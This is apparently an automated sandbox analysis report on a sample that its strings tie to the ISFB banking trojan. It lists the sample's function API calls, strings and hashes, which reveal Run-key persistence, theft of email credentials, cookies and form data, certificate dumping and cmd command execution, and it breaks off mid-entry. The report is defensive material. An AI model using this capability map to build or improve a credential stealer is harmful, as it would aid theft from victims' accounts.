Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

HeapFree.KERNEL32(00000000,?,LastTask,?,?,747DF710,00000000,00000000), ref: 00C9CE88
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 00C9CEA6
HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?,?,?,?,?,?,00C92255), ref: 00C9CED7
HeapFree.KERNEL32(00000000,00CB83E4,0000011B,00000000,00000000,00000000,00000000,?,00000001,00CB83E4,00000002,?,?), ref: 00C9CF4E
RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 00C9D013
wsprintfA.USER32 ref: 00C9D027
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00C92255), ref: 00C9D032
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,00C92255), ref: 00C9D04C
HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,00CB83E4,00000002,?), ref: 00C9D06E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00C9D089
wsprintfA.USER32 ref: 00C9D099
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00C92255), ref: 00C9D0A4

Part of subcall function 00C994B4: lstrlen.KERNEL32(?,00000000,00000000,74785520,?,?,?,00C91647,0000010D,00000000,00000000), ref: 00C994E4
Part of subcall function 00C994B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00C994FA
Part of subcall function 00C994B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,00C91647,0000010D), ref: 00C99530
Part of subcall function 00C994B4: memcpy.NTDLL(00000010,00000000,00C91647,?,?,?,00C91647), ref: 00C9954B
Part of subcall function 00C994B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 00C99569
Part of subcall function 00C994B4: GetLastError.KERNEL32(?,?,?,00C91647), ref: 00C99573
Part of subcall function 00C994B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,00C91647), ref: 00C99599

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,00C92255), ref: 00C9D0BE
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,00CB83E4,00000002,?,?), ref: 00C9D0CE

Strings

Cmd %u parsing: %u, xrefs: 00C9D093
Cmd %s processed: %u, xrefs: 00C9D021
LastTask, xrefs: 00C9CE5B, 00C9CF8F

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
API String ID: 3733591251-3332907627
Opcode ID: 674fb5a1469592e2f4e1a7f5c8597da1efa6642c617c45e06b7f700d953f1e02
Instruction ID: 882252024b9ce9fcaaffa7c3b20bf42b30d0243fbaf90260e4cf0703f91e4afb
Opcode Fuzzy Hash: 674fb5a1469592e2f4e1a7f5c8597da1efa6642c617c45e06b7f700d953f1e02
Instruction Fuzzy Hash: 817129B1900219BFDF21AFA5DCC8EAEBB79FB08344F100629F516A32A0D7715E55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CABBD2, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00CABBED
RtlEnterCriticalSection.NTDLL(00000000), ref: 00CABC0A
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00CABC5A
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00CABC64
GetLastError.KERNEL32 ref: 00CABC6E
HeapFree.KERNEL32(00000000,00000000), ref: 00CABC7F
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00CABCA1
HeapFree.KERNEL32(00000000,?), ref: 00CABCD8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00CABCEC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00CABCF5
SuspendThread.KERNEL32(000003F8), ref: 00CABD04
CreateEventA.KERNEL32(00CBE0D4,00000001,00000000), ref: 00CABD18
SetEvent.KERNEL32(00000000), ref: 00CABD25
CloseHandle.KERNEL32(00000000), ref: 00CABD2C
Sleep.KERNEL32(000001F4), ref: 00CABD3F
ResumeThread.KERNEL32(000003F8), ref: 00CABD63

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00CABBDE

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: 3e36d12e3abb6146e97a44cbb8a28e86374ca640c5987c9ca707e6eac86f6525
Instruction ID: 92e262df9cacd6640a51576ccd4e8992134f766d79824a68575da14d2854dc9a
Opcode Fuzzy Hash: 3e36d12e3abb6146e97a44cbb8a28e86374ca640c5987c9ca707e6eac86f6525
Instruction Fuzzy Hash: 3641617190011AEFCB10AFD4ECC8FADBB79FB05358F144669F51292162DB315E89DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1D51, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?), ref: 00CA1D6A
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CA1D74
LoadLibraryA.KERNEL32(ieframe), ref: 00CA1D96
LoadLibraryA.KERNEL32(ieui), ref: 00CA1D9D
LoadLibraryA.KERNEL32(mshtml), ref: 00CA1DA4
LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 00CA1DAB
LoadLibraryA.KERNEL32(ieapfltr), ref: 00CA1DB2
LoadLibraryA.KERNEL32(urlmon), ref: 00CA1DB9
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll), ref: 00CA1E41

Strings

ieapfltr, xrefs: 00CA1DAD
WININET.dll, xrefs: 00CA1DBB
urlmon, xrefs: 00CA1DB4
mshtml, xrefs: 00CA1D9F
ieui, xrefs: 00CA1D98
inetcpl.cpl, xrefs: 00CA1DA6
ieframe, xrefs: 00CA1D91
WININET.DLL, xrefs: 00CA1D62

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AllocFreeHeap
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
API String ID: 356845663-1120705325
Opcode ID: 99603bd7a97b71ae0ac62ef3ed0e01f15e9428742228826e61ac6d9acd3d7d94
Instruction ID: 15592c08c53f444c7ef6ed6d8e089ea141f8ec6bf635844b490076c66cac8660
Opcode Fuzzy Hash: 99603bd7a97b71ae0ac62ef3ed0e01f15e9428742228826e61ac6d9acd3d7d94
Instruction Fuzzy Hash: E321E170E00219EBDB20AFE59C86BDE7F68EB05B54F14017AE911A2290C6B05E45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8601, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 172stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,00CC0468,Port,?,00CC0468,Secure_Connection,?,00CC0468,User_Name,?,00CC0468,Server,00000000,00000000,00000000), ref: 00CA86D9
lstrcpyW.KERNEL32(00000000,00CC0724), ref: 00CA86F1
lstrcatW.KERNEL32(00000000,00000000), ref: 00CA86F9
lstrlenW.KERNEL32(00000000,?,00CC0468,Password2,?,00CC0468,Port,?,00CC0468,Secure_Connection,?,00CC0468,User_Name,?,00CC0468,Server), ref: 00CA873E
memcpy.NTDLL(00000000,?,?,?), ref: 00CA8797
LocalFree.KERNEL32(?,?), ref: 00CA87AE

Strings

HTTPMail, xrefs: 00CA8666
POP3, xrefs: 00CA8656
Port, xrefs: 00CA86BD
Secure_Connection, xrefs: 00CA86AE
SMTP, xrefs: 00CA8646
Server, xrefs: 00CA868B
Password2, xrefs: 00CA8723
User_Name, xrefs: 00CA86A2
IMAP, xrefs: 00CA8676
P, xrefs: 00CA866D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: 244c57df2c6e6d21b75756eeefe0200748e9e08fc789d00735be5f5b46f406ff
Instruction ID: fd785eb94dab61dea066a594d20fa7fcba0364a1208fa615638f710f1aee82cc
Opcode Fuzzy Hash: 244c57df2c6e6d21b75756eeefe0200748e9e08fc789d00735be5f5b46f406ff
Instruction Fuzzy Hash: 08518F7190020AABCF119FA5CC85EEFBBB9AF46708F248429F521F2151DB708A15DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C95223, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00C9523A
lstrlen.KERNEL32(?), ref: 00C95241
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C95258
lstrcpy.KERNEL32(00000000,?), ref: 00C95269
lstrcat.KERNEL32(?,?), ref: 00C95285
lstrcat.KERNEL32(?,.pfx), ref: 00C9528F
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C952A0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C95338
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00C95368
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C95381
CloseHandle.KERNEL32(00000000), ref: 00C9538B
HeapFree.KERNEL32(00000000,?), ref: 00C9539B
HeapFree.KERNEL32(00000000,00000000), ref: 00C953B6
HeapFree.KERNEL32(00000000,?), ref: 00C953C6

Strings

ISFB, xrefs: 00C9531B, 00C95320, 00C95348
.pfx, xrefs: 00C95287

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: 4bbf7e62c0b51d2003b348e5c7a7ec16196bc41eb5ccc40144bfc9db020a736b
Instruction ID: 2718a3c27bdde5aa07d95187b8517522d71a7755cdad75bd0ab0e96f1877dce5
Opcode Fuzzy Hash: 4bbf7e62c0b51d2003b348e5c7a7ec16196bc41eb5ccc40144bfc9db020a736b
Instruction Fuzzy Hash: F8515BB6800119BFCF12AFA4DC88EAE7B7DFB08394F154565F915A3160DB318E09DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB0669, Relevance: 27.3, APIs: 3, Strings: 15, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,00CA279E,?,00000000), ref: 00CB0718
HeapFree.KERNEL32(00000000,00000008,?,?), ref: 00CB08D1
lstrlen.KERNEL32(00000008,00000000), ref: 00CB0923

Strings

Content-Encoding:, xrefs: 00CB07A8, 00CB0801
X-Frame-Options, xrefs: 00CB086C
Access-Control-Allow-Origin:, xrefs: 00CB0876, 00CB087B, 00CB088D
Cache-Control:, xrefs: 00CB082E
no-cache, no-store, must-revalidate, xrefs: 00CB0829
Etag:, xrefs: 00CB0848
Content-Length:, xrefs: 00CB090A
gzip, xrefs: 00CB07BE
Content-Security-Policy:, xrefs: 00CB0854
Content-Type:, xrefs: 00CB0753
Transfer-Encoding:, xrefs: 00CB08FC
Content-Security-Policy-Report-Only:, xrefs: 00CB0860
HTTP/1.1 404 Not Found, xrefs: 00CB0710
chunked, xrefs: 00CB08F7
Last-Modified:, xrefs: 00CB083C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
API String ID: 462153822-754885170
Opcode ID: b2156a21cbe1e163e830a0b7384af58097d7f1d62891e85db5e45a446adfed05
Instruction ID: fdba68106e3e62eadaf21f4ef08a9f9f40b0ce2f0178edcb947024ad34605d2f
Opcode Fuzzy Hash: b2156a21cbe1e163e830a0b7384af58097d7f1d62891e85db5e45a446adfed05
Instruction Fuzzy Hash: 50A18D71A00201EFDF149F65C885BEA7BA8BF04354F2441A9FC55AB296D7B0ED41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5BE6, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 174stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(07D19608,00000000,00000000,74785520,?), ref: 00CA5C09
lstrlen.KERNEL32(?,00000000,00000000,74785520,?), ref: 00CA5C18
lstrlen.KERNEL32(?,00000000,00000000,74785520,?), ref: 00CA5C25
lstrlen.KERNEL32(00000000,00000000,00000000,74785520,?), ref: 00CA5C3D
lstrlen.KERNEL32(?,00000000,00000000,74785520,?), ref: 00CA5C49
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA5C65
wsprintfA.USER32 ref: 00CA5D1D
memcpy.NTDLL(00000000,00004000,?), ref: 00CA5D62
InterlockedExchange.KERNEL32(00CBE00C,00000000), ref: 00CA5D80
HeapFree.KERNEL32(00000000,00000000), ref: 00CA5DC3

Part of subcall function 00C9AA89: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00C9AAB2
Part of subcall function 00C9AA89: memcpy.NTDLL(00000000,?,?), ref: 00C9AAC5
Part of subcall function 00C9AA89: RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00C9AAD6
Part of subcall function 00C9AA89: RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00C9AAEB
Part of subcall function 00C9AA89: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00C9AB23

Strings

URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 00CA5D48
Cookie: , xrefs: 00CA5CB7
Referer: , xrefs: 00CA5C89
USER: %s, xrefs: 00CA5D17
Accept-Language: , xrefs: 00CA5C9D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
API String ID: 4198405257-1852062776
Opcode ID: 32b9cb36f762b4f24439d74b7b8777bd44909593c60a7f237261b9ae266a7ef9
Instruction ID: c60d03f658a265d98af680b168586405e69a42725bda0e9f0a3120b60a5e7ebb
Opcode Fuzzy Hash: 32b9cb36f762b4f24439d74b7b8777bd44909593c60a7f237261b9ae266a7ef9
Instruction Fuzzy Hash: 4E519A71A0020AAFCF109FA9DC88BEE7BB9EB09358F108129F815E7251D7749A55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C971EC, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 79stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,00C96102,?,?,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00C97203
lstrlenW.KERNEL32(\sols,?,00000000,00C923FE), ref: 00C9720E
lstrlenW.KERNEL32(?,?,00000000,00C923FE), ref: 00C97216
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C9722B
lstrcpyW.KERNEL32(00000000,?), ref: 00C9723C
lstrcatW.KERNEL32(00000000,\sols), ref: 00C9724E
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00C923FE), ref: 00C97253
lstrcatW.KERNEL32(00000000,00CB83E0), ref: 00C9725F
lstrcatW.KERNEL32(00000000,?), ref: 00C97267
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00C923FE), ref: 00C9726C
lstrcatW.KERNEL32(00000000,00CB83E0), ref: 00C97278
lstrcatW.KERNEL32(00000000,00000002), ref: 00C97293
CopyFileW.KERNEL32(?,00000000,00000000,?,00000000,00C923FE), ref: 00C9729B
HeapFree.KERNEL32(00000000,00000000,?,00000000,00C923FE), ref: 00C972A9

Strings

\sols, xrefs: 00C971EC, 00C971ED, 00C9720D, 00C9724C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: 4d12bc4a156300fdb7194182491b7f1c08aaa2e7cf8d9e19abf06bd0595c9b40
Instruction ID: 75af5f0106b26f3ebc894fb2da713b9deba2e25e3492d869553f9f68bbcaeca2
Opcode Fuzzy Hash: 4d12bc4a156300fdb7194182491b7f1c08aaa2e7cf8d9e19abf06bd0595c9b40
Instruction Fuzzy Hash: F321FD32225615EFC721AB64EC89F6F7BACFF85B85F010619F60192160EF609C0ACB74

Uniqueness

Uniqueness Score: -1.00%

Function 00CAFAB4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00CAFAD8

Part of subcall function 00CAE55A: RegCloseKey.ADVAPI32(?,?,?,00CB4D11,00000000,00000000,00000000,00000000), ref: 00CAE5E1

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00CAFB13
lstrcpyW.KERNEL32(-00000002,?), ref: 00CAFB74
lstrcatW.KERNEL32(00000000,.exe), ref: 00CAFB82
lstrcpyW.KERNEL32(?), ref: 00CAFB9C
lstrcatW.KERNEL32(00000000,.dll), ref: 00CAFBA4

Part of subcall function 00CA447F: lstrlenW.KERNEL32(?,.dll,?,00000000,00C9A218,?,.dll,?,00001000,?,?,?), ref: 00CA448D
Part of subcall function 00CA447F: lstrlen.KERNEL32(DllRegisterServer), ref: 00CA449B
Part of subcall function 00CA447F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00CA44B0

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 00CAFC02

Part of subcall function 00CA7854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,00C9F7B7,004F0053,00000000), ref: 00CA7860
Part of subcall function 00CA7854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,00C9F7B7,004F0053,00000000), ref: 00CA7888
Part of subcall function 00CA7854: memset.NTDLL ref: 00CA789A

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 00CAFC37
GetLastError.KERNEL32 ref: 00CAFC42
HeapFree.KERNEL32(00000000,00000000), ref: 00CAFC58
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00CAFC6A

Strings

.dll, xrefs: 00CAFB9E
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00CAFACD
.exe, xrefs: 00CAFB7C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1430934453-2351516416
Opcode ID: c738c76635f20f2389d241f3051ecec3dfcb978d921323900795daa191d6846c
Instruction ID: 727c33cceebc2433713e3883b6b83376067a2cd99b1138bdbc6f1163e4207227
Opcode Fuzzy Hash: c738c76635f20f2389d241f3051ecec3dfcb978d921323900795daa191d6846c
Instruction Fuzzy Hash: C941737190011AFBDF11ABE5DC45FAE7B79FF05758F200669F911A2161EB30DA02EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9B598, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C9B5AD

Part of subcall function 00CB134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,00CA1372,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?,00000001), ref: 00CB135A
Part of subcall function 00CB134B: mbstowcs.NTDLL ref: 00CB1376

lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 00C9B5E6
wcstombs.NTDLL ref: 00C9B5F0
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 00C9B621
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00CA793E), ref: 00C9B64D
TerminateProcess.KERNEL32(?,000003E5), ref: 00C9B663
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00CA793E), ref: 00C9B677
GetLastError.KERNEL32 ref: 00C9B67B
GetExitCodeProcess.KERNEL32(?,00000001), ref: 00C9B69B
CloseHandle.KERNEL32(?), ref: 00C9B6AA
CloseHandle.KERNEL32(?), ref: 00C9B6AF
GetLastError.KERNEL32 ref: 00C9B6B3

Strings

D, xrefs: 00C9B5C1
cmd /C "%s> %s1", xrefs: 00C9B59E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D$cmd /C "%s> %s1"
API String ID: 2463014471-2226621151
Opcode ID: 7b56797e8c44700f0ed10457d01344675ee5c311bdcd70f258e310534123f451
Instruction ID: 0f466d20684a017769c4acb2c225e84830baf2ac8844538709cf345e20849e09
Opcode Fuzzy Hash: 7b56797e8c44700f0ed10457d01344675ee5c311bdcd70f258e310534123f451
Instruction Fuzzy Hash: EB41E5B1900118BFDF11AFA5EE89AEEBBBCEB09344F24406AF505A2150DB716E05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C91460, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 188memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00CA79CF
Part of subcall function 00CA798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00CA79E7
Part of subcall function 00CA798A: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AAD
Part of subcall function 00CA798A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AD6
Part of subcall function 00CA798A: HeapFree.KERNEL32(00000000,00C91489,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AE6
Part of subcall function 00CA798A: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AEF

lstrcmp.KERNEL32(?,?), ref: 00C914D7
HeapFree.KERNEL32(00000000,?), ref: 00C91503
GetCurrentThreadId.KERNEL32 ref: 00C915A9
GetCurrentThread.KERNEL32 ref: 00C915BA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00CA5B4A,?,00000001), ref: 00C915F7
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00CA5B4A,?,00000001), ref: 00C9160B
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00C91619
wsprintfA.USER32 ref: 00C9162A
lstrlen.KERNEL32(00000000,00000000), ref: 00C91635

Part of subcall function 00CAECB1: lstrlen.KERNEL32(?,00000000,00CB6C86,74785520,00C94BBD,?,?,?,00C915E5,?,?,00000000,?,00CA5B4A,?,00000001), ref: 00CAECBB
Part of subcall function 00CAECB1: lstrcpy.KERNEL32(00000000,?), ref: 00CAECDF
Part of subcall function 00CAECB1: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00C915E5,?,?,00000000,?,00CA5B4A,?,00000001), ref: 00CAECE6
Part of subcall function 00CAECB1: lstrcat.KERNEL32(00000000,00000001), ref: 00CAED3D

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00C9164F
HeapFree.KERNEL32(00000000,00000000), ref: 00C91660
HeapFree.KERNEL32(00000000,?), ref: 00C9166C

Strings

DLL load status: %u, xrefs: 00C91624

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: 00a2733792160fc2981fc5eae80894c320bb679fb0ccaa29ebcc1466c49d2c5c
Instruction ID: 202f6a466e08f617d8b44b26db42c3cee62572e542bbd58aeb1761d00df80df1
Opcode Fuzzy Hash: 00a2733792160fc2981fc5eae80894c320bb679fb0ccaa29ebcc1466c49d2c5c
Instruction Fuzzy Hash: 6F71157190011AEFCF11DFA4EC49EEEBBB9FF08354F058169E916A7260D7309A45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7F3D, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

memset.NTDLL ref: 00CA7F6B
StrChrA.SHLWAPI(?,0000000D), ref: 00CA7FB1
StrChrA.SHLWAPI(?,0000000A), ref: 00CA7FBE
StrChrA.SHLWAPI(?,0000007C), ref: 00CA7FE5
StrTrimA.SHLWAPI(?,00CBA48C), ref: 00CA7FFA
StrChrA.SHLWAPI(?,0000003D), ref: 00CA8003
StrTrimA.SHLWAPI(00000001,00CBA48C), ref: 00CA8019
_strupr.NTDLL ref: 00CA8020
StrTrimA.SHLWAPI(?,?), ref: 00CA802D
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00CA8075
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,00CB83E4,00000002,?,?), ref: 00CA8094

Strings

;, xrefs: 00CA7FD3
, xrefs: 00CA8025

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: a747cd878ae558e9f753ea8712a5ce969d1fc053dc8237751f77c1e0bd198b0f
Instruction ID: c0b69c04f4bf46e356f414866af1cd4006d9ed739f9fa2af318e47d9980f7216
Opcode Fuzzy Hash: a747cd878ae558e9f753ea8712a5ce969d1fc053dc8237751f77c1e0bd198b0f
Instruction Fuzzy Hash: D341F4716083069FD720DF688C44B2BBBE8AF56744F040919F8A5D7252EF74DA0CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CAAE20, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74785520,?,00000000,?,?,?), ref: 00CAAE39
lstrlen.KERNEL32(?), ref: 00CAAE3F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CAAE4F
lstrcpy.KERNEL32(00000000,?), ref: 00CAAE69
lstrlen.KERNEL32(?), ref: 00CAAE81
lstrlen.KERNEL32(?), ref: 00CAAE8F
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 00CAAEDD
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00CAAF01
lstrlen.KERNEL32(?), ref: 00CAAF2F
HeapFree.KERNEL32(00000000,?,?), ref: 00CAAF5A
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00CAAF71
HeapFree.KERNEL32(00000000,?,?), ref: 00CAAF7E

Strings

http, xrefs: 00CAAF08, 00CAAF18

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: bb9b42e6a3ffa2e6c9a2a0cd9a701e2413eb9f09e706224c95cb96c418509f49
